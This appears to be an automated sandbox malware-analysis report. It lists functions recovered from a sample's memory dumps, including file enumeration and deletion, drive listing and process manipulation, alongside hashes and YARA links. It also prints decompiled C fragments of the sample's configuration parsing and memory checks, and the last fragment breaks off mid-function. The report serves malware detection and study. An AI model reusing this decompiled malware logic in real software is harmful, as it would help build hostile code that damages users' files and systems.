                                                            • Instruction Fuzzy Hash: 02328B725047059FD721DF29E88096AB7E9FF88364F040A2DF99693260EB35FC45EB11
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04580BC5, Relevance: 28.7, APIs: 19, Instructions: 233stringfilesynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                              • Part of subcall function 04563078: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 0456308F
                                                              • Part of subcall function 04563078: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 045630A9
                                                            • lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C11
                                                            • lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C1D
                                                            • memset.NTDLL ref: 04580C65
                                                            • FindFirstFileW.KERNEL32(00000000,00000000), ref: 04580C80
                                                            • lstrlenW.KERNEL32(0000002C), ref: 04580CB8
                                                            • lstrlenW.KERNEL32(?), ref: 04580CC0
                                                            • memset.NTDLL ref: 04580CE3
                                                            • wcscpy.NTDLL ref: 04580CF5
                                                            • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04580D1B
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04580D50
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04580D6C
                                                            • FindNextFileW.KERNEL32(?,00000000), ref: 04580D85
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 04580D97
                                                            • FindClose.KERNEL32(?), ref: 04580DAC
                                                            • FindFirstFileW.KERNEL32(00000000,00000000), ref: 04580DC0
                                                            • lstrlenW.KERNEL32(0000002C), ref: 04580DE2
                                                            • FindNextFileW.KERNEL32(?,00000000), ref: 04580E58
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 04580E6A
                                                            • FindClose.KERNEL32(?), ref: 04580E85
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                                                            • String ID:
                                                            • API String ID: 2962561936-0
                                                            • Opcode ID: b46245119e2dce116eebdbf76ad6adcdfd2044b6da62df068b84cf99b7b54f1a
                                                            • Instruction ID: 4ace4ff292b905ffd2919461e7984bb16fc1e280e3f0d48c15f8e87d257fbfa7
                                                            • Opcode Fuzzy Hash: b46245119e2dce116eebdbf76ad6adcdfd2044b6da62df068b84cf99b7b54f1a
                                                            • Instruction Fuzzy Hash: AD816CB1504306AFD751BF24DC84A1BBBE8FF94B04F45482DF896A6192DF74E808EB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04574658, Relevance: 16.9, APIs: 11, Instructions: 376memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0457468E
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 045746C0
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 045746F2
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04574724
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04574756
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04574788
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 045747BA
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 045747EC
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0457481E
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000), ref: 045748C5
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 045748F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 94a6861a31200b4f86214e0514a3725672f4796264ed4cccfc21f2c04af89f96
                                                            • Instruction ID: 3f9d77ccb8de4fa3f3392a710dd1264a201b3a8eec59195c65477e9a71f085c5
                                                            • Opcode Fuzzy Hash: 94a6861a31200b4f86214e0514a3725672f4796264ed4cccfc21f2c04af89f96
                                                            • Instruction Fuzzy Hash: A3C1A0A17102169BE711EFB5FCC4D6B37DCBB4A7507118939A806E7200EE39F849BB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456D812, Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,00000000,?,0458C1E4,045805A4,0458C1E4,00000000,?,?,045722F6), ref: 0456D845
                                                            • GetLastError.KERNEL32(?,0458C1E4,045805A4,0458C1E4,00000000,?,?,045722F6), ref: 0456D853
                                                            • NtSetInformationProcess.NTDLL ref: 0456D8AD
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0456D8EC
                                                            • GetProcAddress.KERNEL32(?), ref: 0456D90D
                                                            • TerminateThread.KERNEL32(?,00000000,045722F6,00000004,00000000), ref: 0456D964
                                                            • CloseHandle.KERNEL32(?), ref: 0456D97A
                                                            • CloseHandle.KERNEL32(?), ref: 0456D9A0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                                                            • String ID:
                                                            • API String ID: 3529370251-0
                                                            • Opcode ID: 437105f231d6662b3988510083a724e2c47da126fad0d90635bc3b33d281c7cd
                                                            • Instruction ID: 1dac8c0874bd844af77e248c28a02b028db3eb801f107420c74906e3f78f9edf
                                                            • Opcode Fuzzy Hash: 437105f231d6662b3988510083a724e2c47da126fad0d90635bc3b33d281c7cd
                                                            • Instruction Fuzzy Hash: DC416C70604345EFD7119F25D848A1BBBF4FB88348F040D2DF546A3150DB75AA4CEB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457A5F6, Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wcscpy.NTDLL ref: 0457A62A
                                                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0457A636
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0457A647
                                                            • memset.NTDLL ref: 0457A664
                                                            • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 0457A672
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 0457A680
                                                            • GetDriveTypeW.KERNEL32(?), ref: 0457A68E
                                                            • lstrlenW.KERNEL32(?), ref: 0457A69A
                                                            • wcscpy.NTDLL ref: 0457A6AC
                                                            • lstrlenW.KERNEL32(?), ref: 0457A6C6
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0457A6DF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                                                            • String ID:
                                                            • API String ID: 3888849384-0
                                                            • Opcode ID: 69b76d3e20b4782c2706e7f4cc7cee83fe50fc50bf40e36452e7c09a0959b9c0
                                                            • Instruction ID: f536f525eb7e93aabb58beb85bd2c6ccb5e9518f6be8779a7e408904ce60845a
                                                            • Opcode Fuzzy Hash: 69b76d3e20b4782c2706e7f4cc7cee83fe50fc50bf40e36452e7c09a0959b9c0
                                                            • Instruction Fuzzy Hash: DF310B32800119FFDB119BA5EC88CDEBBB9FF49364B104029F105F2151EB35AE59EB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD2654, Relevance: 12.2, APIs: 8, Instructions: 225memoryCOMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 95%
                                                            			E00DD2654(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				intOrPtr _t53;
				signed int _t59;
				void* _t61;
				void* _t62;
				signed int _t64;
				signed int _t67;
				signed int _t71;
				signed int _t75;
				signed int _t79;
				signed int _t83;
				signed int _t87;
				void* _t92;
				intOrPtr _t109;

				_t93 = __ecx;
				_t28 =  *0xdda2d0; // 0x69b25f44
				if(E00DD57E5( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0xdda324 = _v8;
				}
				_t33 =  *0xdda2d0; // 0x69b25f44
				if(E00DD57E5( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L57:
					return _v12;
				}
				_t39 =  *0xdda2d0; // 0x69b25f44
				if(E00DD57E5( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L55:
					HeapFree( *0xdda290, 0, _v16);
					goto L57;
				} else {
					_t92 = _v12;
					if(_t92 == 0) {
						_t45 = 0;
					} else {
						_t87 =  *0xdda2d0; // 0x69b25f44
						_t45 = E00DD3154(_t93, _t92, _t87 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0xdda298 = _v8;
						}
					}
					if(_t92 == 0) {
						_t46 = 0;
					} else {
						_t83 =  *0xdda2d0; // 0x69b25f44
						_t46 = E00DD3154(_t93, _t92, _t83 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0xdda29c = _v8;
						}
					}
					if(_t92 == 0) {
						_t47 = 0;
					} else {
						_t79 =  *0xdda2d0; // 0x69b25f44
						_t47 = E00DD3154(_t93, _t92, _t79 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0xdda2a0 = _v8;
						}
					}
					if(_t92 == 0) {
						_t48 = 0;
					} else {
						_t75 =  *0xdda2d0; // 0x69b25f44
						_t48 = E00DD3154(_t93, _t92, _t75 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0xdda004 = _v8;
						}
					}
					if(_t92 == 0) {
						_t49 = 0;
					} else {
						_t71 =  *0xdda2d0; // 0x69b25f44
						_t49 = E00DD3154(_t93, _t92, _t71 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0xdda02c = _v8;
						}
					}
					if(_t92 == 0) {
						_t50 = 0;
					} else {
						_t67 =  *0xdda2d0; // 0x69b25f44
						_t50 = E00DD3154(_t93, _t92, _t67 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0xdda2a4 = 5;
						goto L42;
					} else {
						_t93 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t92 == 0) {
								_t51 = 0;
							} else {
								_t64 =  *0xdda2d0; // 0x69b25f44
								_t51 = E00DD3154(_t93, _t92, _t64 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t61 = 0x10;
								_t62 = E00DD496F(_t61);
								if(_t62 != 0) {
									_push(_t62);
									E00DD1000();
								}
							}
							if(_t92 == 0) {
								_t52 = 0;
							} else {
								_t59 =  *0xdda2d0; // 0x69b25f44
								_t52 = E00DD3154(_t93, _t92, _t59 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E00DD496F(0, _t52) != 0) {
								_t109 =  *0xdda37c; // 0x39c9630
								E00DD25ED(_t109 + 4, _t57);
							}
							_t53 =  *0xdda2d4; // 0x2bed5a8
							_t22 = _t53 + 0xddb2d2; // 0x39c887a
							_t23 = _t53 + 0xddb7c4; // 0x6976612e
							 *0xdda320 = _t22;
							 *0xdda390 = _t23;
							HeapFree( *0xdda290, 0, _t92);
							_v12 = 0;
							goto L55;
						}
					}
				}
			}































                                                            0x00dd2654
                                                            0x00dd2657
                                                            0x00dd2677
                                                            0x00dd2685
                                                            0x00dd2685
                                                            0x00dd268a
                                                            0x00dd26a4
                                                            0x00dd28b1
                                                            0x00dd28b8
                                                            0x00dd28bf
                                                            0x00dd28bf
                                                            0x00dd26aa
                                                            0x00dd26c6
                                                            0x00dd289f
                                                            0x00dd28a9
                                                            0x00000000
                                                            0x00dd26cc
                                                            0x00dd26cc
                                                            0x00dd26d1
                                                            0x00dd26e7
                                                            0x00dd26d3
                                                            0x00dd26d3
                                                            0x00dd26e0
                                                            0x00dd26e0
                                                            0x00dd26f1
                                                            0x00dd26f3
                                                            0x00dd26fd
                                                            0x00dd2702
                                                            0x00dd2702
                                                            0x00dd26fd
                                                            0x00dd2709
                                                            0x00dd271f
                                                            0x00dd270b
                                                            0x00dd270b
                                                            0x00dd2718
                                                            0x00dd2718
                                                            0x00dd2723
                                                            0x00dd2725
                                                            0x00dd272f
                                                            0x00dd2734
                                                            0x00dd2734
                                                            0x00dd272f
                                                            0x00dd273b
                                                            0x00dd2751
                                                            0x00dd273d
                                                            0x00dd273d
                                                            0x00dd274a
                                                            0x00dd274a
                                                            0x00dd2755
                                                            0x00dd2757
                                                            0x00dd2761
                                                            0x00dd2766
                                                            0x00dd2766
                                                            0x00dd2761
                                                            0x00dd276d
                                                            0x00dd2783
                                                            0x00dd276f
                                                            0x00dd276f
                                                            0x00dd277c
                                                            0x00dd277c
                                                            0x00dd2787
                                                            0x00dd2789
                                                            0x00dd2793
                                                            0x00dd2798
                                                            0x00dd2798
                                                            0x00dd2793
                                                            0x00dd279f
                                                            0x00dd27b5
                                                            0x00dd27a1
                                                            0x00dd27a1
                                                            0x00dd27ae
                                                            0x00dd27ae
                                                            0x00dd27b9
                                                            0x00dd27bb
                                                            0x00dd27c5
                                                            0x00dd27ca
                                                            0x00dd27ca
                                                            0x00dd27c5
                                                            0x00dd27d1
                                                            0x00dd27e7
                                                            0x00dd27d3
                                                            0x00dd27d3
                                                            0x00dd27e0
                                                            0x00dd27e0
                                                            0x00dd27eb
                                                            0x00dd27fe
                                                            0x00dd27fe
                                                            0x00000000
                                                            0x00dd27ed
                                                            0x00dd27ed
                                                            0x00dd27f7
                                                            0x00000000
                                                            0x00dd2808
                                                            0x00dd2808
                                                            0x00dd280a
                                                            0x00dd2820
                                                            0x00dd280c
                                                            0x00dd280c
                                                            0x00dd2819
                                                            0x00dd2819
                                                            0x00dd2824
                                                            0x00dd2826
                                                            0x00dd2829
                                                            0x00dd282a
                                                            0x00dd2831
                                                            0x00dd2833
                                                            0x00dd2834
                                                            0x00dd2834
                                                            0x00dd2831
                                                            0x00dd283b
                                                            0x00dd2851
                                                            0x00dd283d
                                                            0x00dd283d
                                                            0x00dd284a
                                                            0x00dd284a
                                                            0x00dd2855
                                                            0x00dd2863
                                                            0x00dd286d
                                                            0x00dd286d
                                                            0x00dd2872
                                                            0x00dd2878
                                                            0x00dd2885
                                                            0x00dd288b
                                                            0x00dd2891
                                                            0x00dd2896
                                                            0x00dd289c
                                                            0x00000000
                                                            0x00dd289c
                                                            0x00dd27f7
                                                            0x00dd27eb

                                                            APIs
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00DD5FAE,?,00DD5FAE,69B25F44,?,?,69B25F44,00DD5FAE,?,69B25F44,E8FA7DD7,00DDA00C,745EC740), ref: 00DD26F9
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00DD5FAE,?,00DD5FAE,69B25F44,?,?,69B25F44,00DD5FAE,?,69B25F44,E8FA7DD7,00DDA00C,745EC740), ref: 00DD272B
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00DD5FAE,?,00DD5FAE,69B25F44,?,?,69B25F44,00DD5FAE,?,69B25F44,E8FA7DD7,00DDA00C,745EC740), ref: 00DD275D
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00DD5FAE,?,00DD5FAE,69B25F44,?,?,69B25F44,00DD5FAE,?,69B25F44,E8FA7DD7,00DDA00C,745EC740), ref: 00DD278F
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00DD5FAE,?,00DD5FAE,69B25F44,?,?,69B25F44,00DD5FAE,?,69B25F44,E8FA7DD7,00DDA00C,745EC740), ref: 00DD27C1
                                                            • StrToIntExA.SHLWAPI(00000000,00000000,00DD5FAE,?,00DD5FAE,69B25F44,?,?,69B25F44,00DD5FAE,?,69B25F44,E8FA7DD7,00DDA00C,745EC740), ref: 00DD27F3
                                                            • HeapFree.KERNEL32(00000000,?,?,00DD5FAE,69B25F44,?,?,69B25F44,00DD5FAE,?,69B25F44,E8FA7DD7,00DDA00C,745EC740), ref: 00DD2896
                                                            • HeapFree.KERNEL32(00000000,?,?,00DD5FAE,69B25F44,?,?,69B25F44,00DD5FAE,?,69B25F44,E8FA7DD7,00DDA00C,745EC740), ref: 00DD28A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 4097730f958ec53aaf9f7b4ef3a13ae87c592fcfa8273ddd68fdf544e5ddef52
                                                            • Instruction ID: 6ddec3c21d5f07135f050d6d298a3191dec1fd317f38d9ab39287ddc7088e046
                                                            • Opcode Fuzzy Hash: 4097730f958ec53aaf9f7b4ef3a13ae87c592fcfa8273ddd68fdf544e5ddef52
                                                            • Instruction Fuzzy Hash: 22716175A01305BACB21DBB9DD88D7F7BB9EB58700B284827E406D3315EA32DE049B71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457CC4A, Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04562B55: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,770F4620,00000000,00000000,0456114F,?), ref: 04562B66
                                                              • Part of subcall function 04562B55: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04562B83
                                                            • FreeLibrary.KERNEL32(?), ref: 0457CD80
                                                              • Part of subcall function 04577E67: lstrlenW.KERNEL32(?,00000000,?,?,?,0457CCC5,?,?), ref: 04577E74
                                                              • Part of subcall function 04577E67: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0457CCC5,?,?), ref: 04577E9D
                                                              • Part of subcall function 04577E67: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 04577EBD
                                                              • Part of subcall function 04577E67: lstrcpyW.KERNEL32(-00000002,?), ref: 04577ED8
                                                              • Part of subcall function 04577E67: SetCurrentDirectoryW.KERNEL32(?,?,?,?,0457CCC5,?,?), ref: 04577EE4
                                                              • Part of subcall function 04577E67: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,0457CCC5,?,?), ref: 04577EE7
                                                              • Part of subcall function 04577E67: SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,0457CCC5,?,?), ref: 04577EF3
                                                              • Part of subcall function 04577E67: GetProcAddress.KERNEL32(00000000,?), ref: 04577F10
                                                              • Part of subcall function 04577E67: GetProcAddress.KERNEL32(00000000,?), ref: 04577F2A
                                                              • Part of subcall function 04577E67: GetProcAddress.KERNEL32(00000000,?), ref: 04577F40
                                                              • Part of subcall function 04577E67: GetProcAddress.KERNEL32(00000000,?), ref: 04577F56
                                                              • Part of subcall function 04577E67: GetProcAddress.KERNEL32(00000000,?), ref: 04577F6C
                                                              • Part of subcall function 04577E67: GetProcAddress.KERNEL32(00000000,?), ref: 04577F82
                                                            • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0457CCD6
                                                            • lstrlenW.KERNEL32(?), ref: 0457CCF2
                                                            • lstrlenW.KERNEL32(?), ref: 0457CD0A
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0457CD23
                                                            • lstrcpyW.KERNEL32(00000002), ref: 0457CD38
                                                              • Part of subcall function 0458100F: lstrlenW.KERNEL32(00000000,00000000,73BB8250,73B769A0,?,?,?,0457CD48,?,00000000,0456EE2A), ref: 0458101F
                                                              • Part of subcall function 0458100F: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,0457CD48,?,00000000,0456EE2A), ref: 04581041
                                                              • Part of subcall function 0458100F: lstrcpyW.KERNEL32(00000000,00000000), ref: 0458106D
                                                              • Part of subcall function 0458100F: lstrcatW.KERNEL32(00000000,?), ref: 04581080
                                                            • FindNextFileW.KERNEL32(?,00000010), ref: 0457CD60
                                                            • FindClose.KERNEL32(00000002), ref: 0457CD6E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                                                            • String ID:
                                                            • API String ID: 1209511739-0
                                                            • Opcode ID: 7a3f480d1a3077bc139e3cb99a6d2224f5857b168c8cd04e8232bcfdba89173d
                                                            • Instruction ID: 02267df2533175c5555e7ff0b91a578c32c97eead2b9dcaf41ca1ae5cd943a33
                                                            • Opcode Fuzzy Hash: 7a3f480d1a3077bc139e3cb99a6d2224f5857b168c8cd04e8232bcfdba89173d
                                                            • Instruction Fuzzy Hash: CB416D71404342AFD711EF60E844A2FBBE8FF89B05F04492DF990E2150DB35E909AB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457198F, Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000), ref: 045719A7
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 04571A10
                                                            • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 04571A38
                                                            • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 04571A8A
                                                            • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 04571A95
                                                            • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 04571AA8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                                                            • String ID:
                                                            • API String ID: 499515686-0
                                                            • Opcode ID: 302a72ccb702e888f07669f3d7bdfa757a68c5c6266bee4ebc9d44a23a7507c6
                                                            • Instruction ID: d42729fcd76d407768c7dbcfc677aa090f8f4ddd7020719d88195dcdb4e66fcd
                                                            • Opcode Fuzzy Hash: 302a72ccb702e888f07669f3d7bdfa757a68c5c6266bee4ebc9d44a23a7507c6
                                                            • Instruction Fuzzy Hash: E5416E7190060AEFDF11EFA4ED44AAE7BB9FF00704F144669E801B6250EB75AB54FB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457C5F4, Relevance: 7.9, APIs: 6, Instructions: 399COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0458374E: memset.NTDLL ref: 0458376E
                                                              • Part of subcall function 0458374E: memset.NTDLL ref: 045838A2
                                                              • Part of subcall function 0458374E: memset.NTDLL ref: 045838B7
                                                            • memcpy.NTDLL(?,00008F12,0000011E), ref: 0457C679
                                                            • memset.NTDLL ref: 0457C6AF
                                                            • memset.NTDLL ref: 0457C6FD
                                                            • memset.NTDLL ref: 0457C77C
                                                            • memset.NTDLL ref: 0457C7EB
                                                            • memset.NTDLL ref: 0457C8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memset$memcpy
                                                            • String ID:
                                                            • API String ID: 368790112-0
                                                            • Opcode ID: d0b8ebad7f16959bc61f4dd2fb7fbc119d01e9a7edbd370f882f2edf3226e720
                                                            • Instruction ID: 19b4fe2317bb326b69f6ab83349bbb81bb0826c6cd225ec62a7a4462e0f0eaf7
                                                            • Opcode Fuzzy Hash: d0b8ebad7f16959bc61f4dd2fb7fbc119d01e9a7edbd370f882f2edf3226e720
                                                            • Instruction Fuzzy Hash: 41F1DD30600B8ACFDB32CF69E5846AABBF4BF42704F144D6DD5D796682D231BA45EB10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B2495, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195nativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E6E4B2495(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6e4b41f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6e4b4240 = 1;
